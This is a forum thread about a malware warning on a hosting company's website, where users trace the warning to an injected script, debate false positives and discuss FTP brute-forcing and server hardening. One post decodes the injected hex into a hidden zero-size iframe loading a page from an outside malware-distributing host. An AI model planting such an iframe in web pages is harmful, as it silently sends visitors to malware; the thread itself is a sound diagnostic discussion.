Warning of Malware on Vivaciti web site

Just visited Vivaciti web site from the link in there sig and got a malware detected warning.

Message reads:
vivaciti.net contains content from shersby.net, a site known to distribute malware. Your computer might catch a virus if you visit this site.

Edited by Kimi (Sat 05-Nov-11 22:11:15)

Sounds as if it already has.

chrome currently gives a warning, ie 9 does not

In reply to a post by ggremlin:

chrome currently gives a warning, ie 9 does not

Yep i'm using Chrome

The script is there, at the bottom of the page.

Looks like injected. Normally happens with Wordpress or other CMSs.

Matt

In reply to a post by XRaySpeX:

Sounds as if it already has.

Not me

F.Y.I :

The domain shersby.net is hosted from IP address 78.129.195.100, ... The server hosting shersby.net is located in a data center in Durham

Host Details: shersby.net
IP Address:
78.129.195.100
IP Block:
78.129.195.0 - 78.129.195.255
Reverse DNS:
host.vivaciti.net
Host:
Companyinformation.com Limited
Durham, Durham, GB
Location:
Durham, Durham, GB
Page Load Time:
0.641 secs.
Server Type:
Apache/2.0.63

I've just been on this site with IE9, Firefox7 and Chrome15 and I use AVG2012 free edition which is up to date. There is no notes to say of any problems. It might just be either an over active virus checker or someone is trying to scare people away from the site.

Interesting if one googles the site owner . Unlikely to be a hacker.

I seem to recall a thread somewhere recently mentioning Kaspersky giving a false positive for this site..

NOD and 32 doesn't seem to have a problem with it, and Comodo Firewall has not flagged it up either. both are usually pretty hot at intervening if there is a problem.

In reply to a post by bernardbrown:

I've just been on this site with IE9, Firefox7 and Chrome15 and I use AVG2012 free edition which is up to date. There is no notes to say of any problems. It might just be either an over active virus checker or someone is trying to scare people away from the site.

nothing to do with virus checkers, google gives the warning through Chrome. Heres the diagnostic page

Yep google are trying to scare people away from the site.

I did copy and google the hex code at the end of the Home Page, that Matt mentioned. It appears as a large smiley face with "YO!" and a bit of odd stuff at the bottom.

Funny! I translated it as:

<iframe width="0" height="0" style="width: 0%; height: 0%;" frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>write

but then I'm not Google .

Looks like some detritus left behind by an HTML editor.

Kaspersky still does give a warning.

In reply to a post by Kimi:

google gives the warning through Chrome.

Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.

Up to this evening a Google search for vivaciti.net took you to their homepage, but now it gives you:

Warning - visiting this web site may harm your computer!

and refuses to take you there.

Whereas, at least since the start of this thread, a Google search for shersby.net tells you on the results page "This site may harm your computer." and blocks you from visiting it.

In reply to a post by XRaySpeX:

Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.

Google gives the warning whether you go direct or through a search

In reply to a post by XRaySpeX:

In reply to a post by Kimi:

google gives the warning through Chrome.

Where's Google come into it? You're not searching Google for Vivaciti so as to access it, are you? You said you were going directly from a link in their sig.

[cough]Chrome browser is by who?

In reply to a post by XRaySpeX:

Funny! I translated it as:

<iframe width="0" height="0" style="width: 0%; height: 0%;" frameborder="0" src="http://shersby.net/sTDS/go.php?sid=1"></iframe>write

but then I'm not Google .

Looks like some detritus left behind by an HTML editor.

Start at \x3C\x69\x66\x72\ following the var _0x3f46 and end before the closing quote of that. Copy that long hex sequence into google.uk, and the first result link is
http://downloads.securityfocus.com/vulnerabilities/e...
giving you what I described, occupying more than a full screen. But I just noticed Norton also gave a warning about a malicious script, the first time I went to vivaciti after an overnight laptop switch-off, (not the second time), so perhaps I'm not seeing the nasty bit in View Source in IE9. See following edited reply to MadMan.

Edited by RobertoS (Tue 08-Nov-11 08:46:50)

In reply to a post by MadMan:

Kaspersky still does give a warning.

I just noticed Norton also gave a warning about a malicious script, the first time I went to vivaciti after an overnight laptop switch-off, but not the second time. False alarm. Examination of the Norton Activity log shows it was complaining about Sony Vaio Care trying to access the Norton exe.

Edited by RobertoS (Tue 08-Nov-11 08:45:05)

Are you using Google DNS?

That hex script has now been removed from Vivaciti Homepage.

However a Google search for Vivaciti now says "This site may harm your computer." on the results page; it didn't last night.

Sorry, I'm not au fait with Google products !

In reply to a post by RobertoS:

Copy that long hex sequence into google.uk, and the first result link is http://downloads.securityfocus.com/vulnerabilities/e...
giving you what I described, occupying more than a full screen.

That's as maybe, but it is meaningless and irrelevant! The hex still decodes into what I stated before.

In reply to a post by RobertoS:

http://downloads.securityfocus.com/vulnerabilities/e...

FYI: That stuff you found was part of QtWeb Browser Malformed HTML File Remote Denial of Service Vulnerability

Bob,

Kaspersky KIS2012 is OK with the vivaciti site now, Norton DNS isn't blocking it either

In reply to a post by XRaySpeX:

However a Google search for Vivaciti now says "This site may harm your computer." on the results page; it didn't last night.

Now removed again and site unblocked by Google. Probably as result of recent removal of hex script from homepage.

Post deleted by Capvermell

In reply to a post by Capvermell:

I am the registrant of this domain on the Vivaciti website ....

What a very strange and puzzling post.

1) "This domain"? What domain?

2) You seem to be reporting a problem with the vivaciti website itself. Not the content of your web space.

3) So you got to your domain administration page, with this report. Have you looked via that page at what is in your web space? You don't say you have, so what makes you say your web space is infected with anything?

Oh - a thought just occurred to me. What happens if, when you have this report showing, you press F5?

Post deleted by Capvermell

Edited by deleted (Wed 23-Jan-13 12:55:18)

In reply to a post by RobertoS:

1) "This domain"? What domain?

The OP mentions a domain in addition to vivaciti.net - a domain which appears to be registered to a private individual and hosted on the vivaciti web space.

Edited by deleted (Wed 23-Jan-13 13:18:32)

There are many ways an attacker could have gained access to your control panel. Some seem to spend all day probing my servers for exactly this sort of things (in my case they won't get very far as I don't administer them that way... but they still keep trying). And I'm sure they'll target other servers too, not just mine.
How secure is your admin password for that site?
Did you receive a password in email - and did you change it after receiving it?
Or of course it could just be that the security of the site isn't as good as it could be, and there's nothing you can do to change that.

This thread is all about some malware being reported on access to Vivaciti's home page, not from your shersby.net domain or webspace.

Why don't you just try and help me resolve the issue rather than talking down to me officiously and patronisingly

What issue? Our issue has been resolved over a year ago.

Also all of you in this thread began talking about my registered web domain without my permission.

Eh? we don't need your permission to discuss a name that appears in the public domain.

Methinks, you are getting uppity about something that is done and dusted. You have come late to the party .

Just make sure you don't look at shersby.net...
Looks like nobody has done anything to remove the content from there.

What does it do? I accidentally got to the http:// sh... version just now. That gave a single page with a on-off button and some odd text.

Ah - I see my IS blocked it:- Medium,Unauthorized access blocked (Access Process Data),Blocked,No Action Required.

Not tried the www. version.

I've only got the HTML using wget - because all that does is to save it to a local file and does not execute any scripts.
Opening the result with a text editor, there is a lot of included javascript from another site, which itself appears to contain content which was not intended by the site's owner...
I have seen enough, and I won't be opening these pages in a browser.

In reply to a post by Uilebheist:

There are many ways an attacker could have gained access to your control panel.

Aided by having his full name and address from the WHOIS perhaps.

Quite possibly, depending the one's choice of passwords...

The site has been defaced by an Indonesian script kiddie.

I've just had a look at the source, which contains "Copyright 2012". If that's true, this occurred long after this thread died in its original incarnation.

I'm amazed that vivaciti's anti-hacking setup isn't more robust than the Pentagon's. It really is too bad.

In reply to a post by Capvermell:

... and meant to switch all my email to it but then life and other matters got in the way.

However it appears you do use it for some email, so your domain name could get anywhere. Providing a target for hackers.

Wierd though that the source has that 2012 in it, when the original problem was cleared in 2011. I wonder if there is any tenuous connection with a previous owner of the domain, (not that the previous owner need be anything to do with this), and somehow your email address is being spoofed as well?

You are right... "Last-Modified: Sun, 02 Sep 2012 17:24:32 GMT"
As for the anti-hacking setup, surely the Pentagon doesn't have important enough secrets to worry about anything

I doubt if it has any secrets by now.

Post deleted by MrSaffron

Post removed as it added nothing to the thread other than perhaps fuelling fights

from my experience most of these injections occur via poor ftp passwords and successful brute force attempts, although obviously it isnt the only way in.

Quite .

So far, in his pique, he appears to have ignored this post of mine which is supposed to be helpful in that there is a fair chance that the shersby email address he has used is also the login username for his account.

A point I would have made to him, given a sensible reply. At least it is here now, so maybe it will help him.

Speaking of pique, go and reread his two posts

ROFL

There was an issue some time ago (as you can see from the date of the original thread that has been exhumed.

The issue was around weak passwords being used to brute force a number of sites.

In reply to a post by vivaciti:

There was an issue some time ago (as you can see from the date of the original thread that has been exhumed.

The issue was around weak passwords being used to brute force a number of sites.

Can i be so bold has to ask why you didn't mention the reason behind the malware at the time of the original thread?

Maybe in the year 1999. Things have moved on since then.

not in my experience, still lots of ftp break in's I see occur on many servers due to weak passwords, and indeed vivaciti seem to have even confirmed it now as a weak password issue.

Brute force is just only of many methods used by attackers, although it's pretty inefficient. These days it's far easier to exploit a vulnerability in a web script, server-side service or use SQL injection to extract password hashes and run them through a table or two.

I am aware, but just posted my experience of where most exploitations have come from on servers I have access to.

web script vulns and the like can be mitigated by security filters.

If someone is smart enough to harden a server, they'll probably go all the way and disable FTP altogether or at least lock it down.

?
If you disable FTP then hosting customer websites surely becomes a little difficult? Any normal way of allowing customers to FTP would still be hackable.

SFTP over SSH with public key support is superior.

Plenty of ftpds include anti-brute-force protection. It's usually just a case of enabling it in the config.

/me showing ignorance, again .

Edited by RobertoS (Sat 26-Jan-13 12:54:26)

In reply to a post by Zadeks:

If someone is smart enough to harden a server, they'll probably go all the way and disable FTP altogether or at least lock it down.

on shared hosting where the end user expects ftp, sales needs come first.

where I have the power to tho I now enforce strong passwords and apply rate limiting on login attempts.

I agree with both of these things, although on the former its the case of the end user using it or been willing to use it.

Yes you can.
Our customers were informed of the issues and the reasons directly, had you been one of our customers, you would have received the information.

In reply to a post by vivaciti:

Yes you can.
Our customers were informed of the issues and the reasons directly, had you been one of our customers, you would have received the information.

I was a potential customer (well my son was to be honest), we went on to your web site to look in to purchasing hosting from you, but your lack of information and the seemingly head in the sand approach on the issue, but doubts in his mind and so he ended up going with Uno.

The malware warning stopped me going any further on your web site so i asked the question here but you chose to ignore it.